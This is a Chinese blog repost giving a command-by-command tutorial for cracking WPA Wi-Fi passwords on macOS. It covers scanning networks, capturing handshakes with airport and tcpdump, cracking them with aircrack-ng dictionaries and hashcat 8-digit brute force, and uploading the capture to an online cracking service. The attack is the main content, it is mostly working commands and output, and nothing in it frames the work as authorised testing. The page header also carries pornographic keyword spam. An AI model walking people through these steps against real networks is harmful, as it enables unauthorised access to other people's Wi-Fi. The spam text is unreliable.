日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

macOS 安装 aircrack-ng 破解 wifi,hashcat ,OnlineHashCrack,在线破解握手包

發布時間:2023/12/18 编程问答 39 豆豆
生活随笔 收集整理的這篇文章主要介紹了 macOS 安装 aircrack-ng 破解 wifi,hashcat ,OnlineHashCrack,在线破解握手包 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

macOS 安裝aircrack-ng

  • macOS系統版本
  • 1,安裝和更新aircrack-ng
  • 2,查看 aircrack-ng版本
  • 3,查看附近wifi
  • 4,抓包
    • 4.1,macos mojave airport sniff 報錯
  • 5,跑字典
  • 6,安裝hashcat
  • 7,安裝hashcat-utils
  • 8,cap 轉 hccapx
  • 9,hashcat破解密碼
    • 9.1 hashcat 規則破解密碼
  • 10,在線HASH CRACK

macOS系統版本

sw_versProductName: Mac OS X ProductVersion: 10.13.6 BuildVersion: 17G65

1,安裝和更新aircrack-ng

brew search aircrack-ng brew install aircrack-ng brew upgrade aircrack-ngsudo chown -R $(whoami) /usr/local brew link aircrack-ng$ which aircrack-ng /usr/local/bin/aircrack-ng

2,查看 aircrack-ng版本

brew info aircrack-ng

aircrack-ng: stable 1.5.2 (bottled)

3,查看附近wifi

sudo ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/local/bin/airportairport -s

4,抓包

sudo airport en1 sniff 1

en1 無線網卡名稱
1 破解Wi-Fi信道CHANNEL

aircrack-ng /tmp/airportSniffxNVV5o.cap | grep 1B:42 aircrack-ng airportSniffxQnNSI.cap | grep "1 handshake"

WPA (0 handshake) 0沒有抓到握手包
WPA (1 handshake) 1成功抓到握手包

4.1,macos mojave airport sniff 報錯

  • ?系統版本
$ sw_vers ProductName: Mac OS X ProductVersion: 10.14.4 BuildVersion: 18E226
  • 報錯 Segmentation fault: 11
$ sudo airport en1 sniff 1 Capturing 802.11 frames on en1. Segmentation fault: 11
  • 使用tcpdump 抓包
# 斷開wifi的連接 $ sudo airport -z # Wi-Fi對頻道1進行嗅探 $ sudo airport -c1 $ sudo tcpdump "type mgt subtype beacon and ether src e4:f3:f5:33:11:22" -I -c 1 -i en1 -w beacon.cap tcpdump: listening on en1, link-type IEEE802_11_RADIO (802.11 plus radiotap header), capture size 262144 bytes 1 packet captured 113 packets received by filter 0 packets dropped by kernel # Got為0等待Wi-Fi被連接 $ sudo tcpdump "ether proto 0x888e and ether host e4:f3:f5:33:11:22" -I -U -vvv -i en1 -w cap.cap tcpdump: listening on en1, link-type IEEE802_11_RADIO (802.11 plus radiotap header), capture size 262144 bytes Got 0 # Got為4當wifi被連接時成功抓取握手包 $ sudo tcpdump "ether proto 0x888e and ether host e4:f3:f5:93:1b:42" -I -U -vvv -i en1 -w cap.cap tcpdump: listening on en1, link-type IEEE802_11_RADIO (802.11 plus radiotap header), capture size 262144 bytes Got 4$ mergecap -a -F pcap -w handshake.cap beacon.cap cap.cap $ aircrack-ng -w dic.txt wifiCap/handshake.cap

5,跑字典

aircrack-ng -w pass.txt /tmp/airportSniffxNVV5o.cap aircrack-ng -w pass.txt -b e4:f3:f5:93:1b:42 /tmp/airportSniffxNVV5o.cap

6,安裝hashcat

brew search hashcat brew install hashcat

7,安裝hashcat-utils

git clone https://github.com/hashcat/hashcat-utils cd hashcat-utils/src/ make

8,cap 轉 hccapx

./cap2hccapx.bin /tmp/airportSniffxQnNSI.cap /tmp/output.hccapx MERCURY_1B44

9,hashcat破解密碼

hashcat -m 2500 /tmp/output.hccapx /root/pass.txt

9.1 hashcat 規則破解密碼

INFO: All hashes found in potfile! Use --show to display them.

刪除hashcat.potfile中內容

find / -name "hashcat.potfile"

-a 3 : 攻擊模式 3 = Brute-force(掩碼暴力破解)
?d?d?d?d?d?d?d?d : 8為數字破解 ,?d代表數字

hashcat -m 2500 -a 3 /tmp/output.hccapx ?d?d?d?d?d?d?d?d

10,在線HASH CRACK

  • 在線HASH CRACK 上傳hccapx

參考:

  • aircrack-ng破解wifi
  • 破解wifi 密碼(mac 版)
  • 使用macbook破解WPA/WPA2 wifi密碼
  • Mac上跑wifi密碼方法 hashcat
  • 使用Brew在Mac上安裝hashcat
  • Install Hashcat Utils
  • hashcat_utils
  • Hashcat manual: how to use the program for cracking passwords
  • 密碼破解全能工具:Hashcat密碼破解攻略
  • Capturing WPA handshakes with OS X
  • Sniff - The good way with tcpdump
  • 總結

    以上是生活随笔為你收集整理的macOS 安装 aircrack-ng 破解 wifi,hashcat ,OnlineHashCrack,在线破解握手包的全部內容,希望文章能夠幫你解決所遇到的問題。

    如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。